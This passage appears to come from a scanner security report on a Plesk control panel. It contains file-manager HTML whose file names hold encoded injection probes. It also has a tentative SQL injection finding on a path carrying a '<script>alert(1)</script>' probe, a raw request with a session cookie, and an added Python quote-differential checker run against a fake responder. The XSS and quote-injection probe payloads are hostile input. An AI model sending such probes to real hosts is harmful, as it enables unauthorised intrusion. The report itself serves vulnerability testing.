onClick="Event.stop(event);FileListShowAll(document.forms[0]);return false;" style=""><BUTTON name="bname_show_all" id="buttonid-show-all" type="button" onClick="Event.stop(event);FileListShowAll(document.forms[0]);return false;">Reset Search</BUTTON><SPAN id="spanid-show-all">Reset Search</SPAN></DIV></TD></TR></TABLE></div></td></tr></table></div><div class="paging pagingTop"><input type="hidden" name="page" value ="0"><input type="hidden" name="page_size" value ="25"><table width="100%"><tr><td>1-25 <A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=chdir&amp;file=%2F" onClick=";lon();">vulnerable.host.fqdn</a> / <A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=chdir&amp;file=%2Fhttpdocs%2F" onClick=";lon();">httpdocs</a> items of 44 total</td><td align="center">Pages:&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" 
id="2abfff8e531baa56c2aa8da2f0cc2708">First</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">&lt;&lt;</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">1</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">2</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">&gt;&gt;</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">Last</a></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="FileListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="FileListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="FileListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><input type="hidden" name="sort" value="name"><table width="100%" cellspacing="0" class="list"><TR><th width="0" class="select"><input type="checkbox" class="checkbox" name="FileListSelectAll" value="true" onClick="FileListSelect()"></th><th class="icon"><A href="#" onClick="FileListSort(&#039;type&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by type.&quot;&#125;]);" onMouseOut="tooltip.hide();">T</a></th><th width="65%" class="sort"><A href="#" onClick="FileListSort(&#039;name_reverse&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by name.&quot;&#125;]);" onMouseOut="tooltip.hide();">Name</a><img src="/skins/default/plesk/icons/arrow_up.gif"></th><th width="15%" class="number"><A href="#" onClick="FileListSort(&#039;size&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by 
size.&quot;&#125;]);" onMouseOut="tooltip.hide();">Size</a></th><th width="20%" class="number"><A href="#" onClick="FileListSort(&#039;ch_date&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by modification date.&quot;&#125;]);" onMouseOut="tooltip.hide();">Modification date</a></th><th>&nbsp;</th><th>&nbsp;</th><th>&nbsp;</th><th>&nbsp;</th></TR><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td>&nbsp;</td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2F" onClick=";lon();" onMouseOver="f(event, &#039;pdir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_pdir.gif" width="16" height="16" alt="file_pdir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2F" onClick=";lon();">..</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 03:11 PM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = 
this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_App_Data" value="App_Data" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2FApp_Data%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2FApp_Data%2F" onClick=";lon();">App_Data</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/App_Data" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=App_Data" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2FApp_Data" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == 
el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_css" value="css" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fcss%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fcss%2F" onClick=";lon();">css</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/css" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=css" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Fcss" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == 
onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=673db%252522a%25253d%252522b%2525226c91d8a7d6d" onClick="return bin();;lon();">673db%2522a%253d%2522b%25226c91d8a7d6d</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/673db%2522a%253d%2522b%25226c91d8a7d6d" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=673db%252522a%25253d%252522b%2525226c91d8a7d6d" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F673db%252522a%25253d%252522b%2525226c91d8a7d6d" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=673db%252522a%25253d%252522b%2525226c91d8a7d6d" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, 
&quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_6c91d8a7d6d" value="6c91d8a7d6d" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=6c91d8a7d6d" onClick="return bin();;lon();">6c91d8a7d6d</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/6c91d8a7d6d" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=6c91d8a7d6d" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F6c91d8a7d6d" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=6c91d8a7d6d" 
onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_73dd0%2522%2520a%253db%25202d0878db96d" value="73dd0%2522%2520a%253db%25202d0878db96d" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=73dd0%252522%252520a%25253db%2525202d0878db96d" onClick="return bin();;lon();">73dd0%2522%2520a%253db%25202d0878db96d</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/73dd0%2522%2520a%253db%25202d0878db96d" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=73dd0%252522%252520a%25253db%2525202d0878db96d" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A 
href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F73dd0%252522%252520a%25253db%2525202d0878db96d" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=73dd0%252522%252520a%25253db%2525202d0878db96d" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_7b286%2522%253e%253ca%253ef79f4c51d2e" value="7b286%2522%253e%253ca%253ef79f4c51d2e" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onClick="return bin();;lon();">7b286%2522%253e%253ca%253ef79f4c51d2e</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/7b286%2522%253e%253ca%253ef79f4c51d2e" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG 
src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr></table><div class="paging pagingBottom"><table width="100%"><tr><td>1-25 <A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=chdir&amp;file=%2F" onClick=";lon();">vulnerable.host.fqdn</a> / <A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=chdir&amp;file=%2Fhttpdocs%2F" onClick=";lon();">httpdocs</a> items of 44 total</td><td align="center">Pages:&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">First</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">&lt;&lt;</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">1</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">2</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return 
false;;lon();">&gt;&gt;</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">Last</a></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="FileListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="FileListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="FileListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><script>SetCookie("filelist", "YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9");
           function FileListSetPaging(page)
           {
               var f = document.forms[0];
               f.page.value = page;
               f.cmd.value = "setPage";
               lsubmit(f);
               return false;
           }

           function FileListSetPageSize(page_size)
           {
               var f = document.forms[0];
               f.page_size.value = page_size;
               f.cmd.value = "setPageSize";
               lsubmit(f);
               return false;
           }
       
           function FileListSelectionGet()
           {
               var f = document.forms[0];
               var selection = new Array();
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled) && f.elements[i].checked) {
                           selection.push(f.elements[i].value);
                       }
                   }
               }
               return selection;
           }
           function FileListSelect()
           {
               f = document.forms[0];
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled)) {
                           f.elements[i].checked = f.FileListSelectAll.checked;
                           FileListSelectOnChange(f.elements[i]);
                       }
                   }
               }
               return true;
           }
       
           function FileListSelectOnChange(o)
           {
               o = $(o);
               if ("radio" == o.type) {
                   $$("input[name='" + o.name + "']").each(function(el){
                       el.up("tr").removeClassName("selected");
                   });
               }

               if (o.checked)
                   o.up("tr").addClassName("selected");
               else
                   o.up("tr").removeClassName("selected");

               return true;
           }
       
           function FileListSort(sort)
           {
               f = document.forms[0];
               f.sort.value = sort;
               f.cmd.value = "setSort";
               lsubmit(f);
               return false;
           }
       
           function FileListFilter(f)
           {
               
               if (f.filter.value.length == 0) {
                   FileListShowAll(f);
                   return false;
               }
       
               f.cmd.value = "setFilter";
               lsubmit(f);
               return false;
           }
       
           function FileListShowAll(f)
           {
               f.cmd.value = "clearFilter";
               lsubmit(f);
               return false;
           }
       
           function FileListSearchShow()
           {
               var sc = document.getElementById("FileListSearchControl");
               if (sc) {
                   removeClass(sc, "hide");
                   addClass(sc, "show");
               }

               var s = document.getElementById("FileListSearch");
               if (s) {
                   removeClass(s, "hide");
                   addClass(s, "show");
               }

               SetPermanentCookie("cListShowSearch", 1);
           }
       
           function FileListSearchHide()
           {
               var sc = document.getElementById("FileListSearchControl");
               if (sc) {
                   removeClass(sc, "show");
                   addClass(sc, "hide");
               }

               var s = document.getElementById("FileListSearch");
               if (s) {
                   removeClass(s, "show");
                   addClass(s, "hide");
               }

               SetPermanentCookie("cListShowSearch", 0);
           }
       
           function FileListRemove(f)
           {
               if (0 == FileListSelectionGet().length) {
                   alert("No objects selected.");
                   return false;
               }
               f.cmd.value = "remove";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/view/";
               lsubmit(f);
               return false;
           }
       </script>

   </td></tr></table></fieldset>

   <div class="footnote"></div>
</div>

<input type="hidden" name="file" value="">
<input type="hidden" name="subcmd" value="">




</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

1.5. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/web/%3Cscript%3Ealert(1)%3C/script%3E [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/web/%3Cscript%3Ealert(1)%3C/script%3E

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Note that the error shown in Response 1 is Plesk's generic "Invalid URL was requested." message for an unroutable path (the path itself carries the <script>alert(1)</script> probe), not a database error, so the single-quote/double-quote differential alone does not show that the quote ever reached a query; the Tentative confidence should stand until the actual error text has been reviewed by hand.
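The two-request heuristic described in the issue detail, together with the check a reviewer would add before trusting it, as an added example that is not code from XSS.CX, Burp Suite or Parallels: `probe_param_name` sends the parameter name `1'=1` and then `1''=1` exactly as Request 1 and Request 2 do, and classifies the pair of responses, treating an application error that is identical for both probes as a routing or validation message rather than evidence that the quote reached a SQL query. The `fake_fetch` responder, its sample bodies and both signature lists are constructed for this example; only the "Invalid URL was requested." text is taken from Response 1 on this page.

```python
"""Quote-differential SQL injection probe with a generic-error check.

Added example for finding 1.5; not code from XSS.CX, Burp Suite or
Parallels. The fetch callable, the sample responses and the signature
lists below are constructed for this example.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Callable, Tuple

# Database error fragments that show a quote reached a query.
# Assumption of the example: a short list, not taken from the report.
SQL_ERROR_SIGNATURES = (
    r"you have an error in your sql syntax",
    r"unclosed quotation mark after the character string",
    r"quoted string not properly terminated",
    r"sqlstate\[",
)

# Application errors that say nothing about SQL. The first is the message
# Plesk returns in Response 1 for the unroutable /smb/web/... path.
GENERIC_ERROR_SIGNATURES = (
    r"invalid url was requested",
)

Fetch = Callable[[str], Tuple[int, str]]  # url -> (status, body)


@dataclass
class Verdict:
    label: str    # sql-error-differential | generic-error | tentative | no-differential
    reason: str


def _matches(patterns, body: str) -> bool:
    return any(re.search(p, body, re.IGNORECASE) for p in patterns)


def probe_param_name(fetch: Fetch, base_url: str) -> Verdict:
    """Send 1'=1 and then 1''=1 as a parameter *name* and compare the responses."""
    _, body_one = fetch(base_url + "?1'=1")
    _, body_two = fetch(base_url + "?1''=1")

    sql_one = _matches(SQL_ERROR_SIGNATURES, body_one)
    sql_two = _matches(SQL_ERROR_SIGNATURES, body_two)
    if sql_one and not sql_two:
        return Verdict("sql-error-differential",
                       "database error with a single quote, none with two")

    # The differential only means something if the "error" is database-related.
    # A routing/validation message that is identical for both probes shows the
    # quote never reached a query.
    if _matches(GENERIC_ERROR_SIGNATURES, body_one) and body_one == body_two:
        return Verdict("generic-error",
                       "same generic application error for both probes")

    if body_one != body_two:
        return Verdict("tentative",
                       "responses differ but no database error signature; review by hand")
    return Verdict("no-differential", "identical responses for both probes")


# --- constructed stand-in for a target, so the example runs offline --------

PLESK_LIKE_ERROR = (
    '<div class="msg-box msg-error"><div class="msg-content">'
    '<span class="title">Error:</span> Invalid URL was requested. </div></div>'
)


def fake_fetch(url: str) -> Tuple[int, str]:
    """Constructed responder: a Plesk-like panel plus one injectable endpoint."""
    path, _, query = url.partition("?")
    if path.endswith("/smb/web/%3Cscript%3Ealert(1)%3C/script%3E"):
        # Unroutable path: the same generic page whatever the query string says.
        return 200, PLESK_LIKE_ERROR
    if path.endswith("/vuln"):
        # An odd number of quotes breaks the (imaginary) quoted SQL literal.
        if query.count("'") % 2 == 1:
            return 500, "You have an error in your SQL syntax; check the manual"
        return 200, "<html><body>ok</body></html>"
    return 404, "not found"


if __name__ == "__main__":
    panel = ("http://vulnerable.plesk.control.panel.20110407.20:8880"
             "/smb/web/%3Cscript%3Ealert(1)%3C/script%3E")
    print(probe_param_name(fake_fetch, panel))
    print(probe_param_name(fake_fetch, "http://target.example/vuln"))
```

Against the Plesk-like path the probe returns `generic-error`, because both requests get the same "Invalid URL was requested." page; against the constructed `/vuln` endpoint it returns `sql-error-differential`. Swapping `fake_fetch` for a real HTTP client that returns `(status, body)` turns this into a manual confirmation step for a Tentative scanner finding.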

Request 1

GET /smb/web/%3Cscript%3Ealert(1)%3C/script%3E?1'=1 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; advancedPanel-hidden=0; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; dsnlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domainaliaseslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; psaContext=dashboard; backupftprepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_login_page=deleted; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domaintrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; no_frames=deleted;

Response 1 (redirected)

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:37:00 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:37:00 GMT
Connection: close
Content-Length: 16251

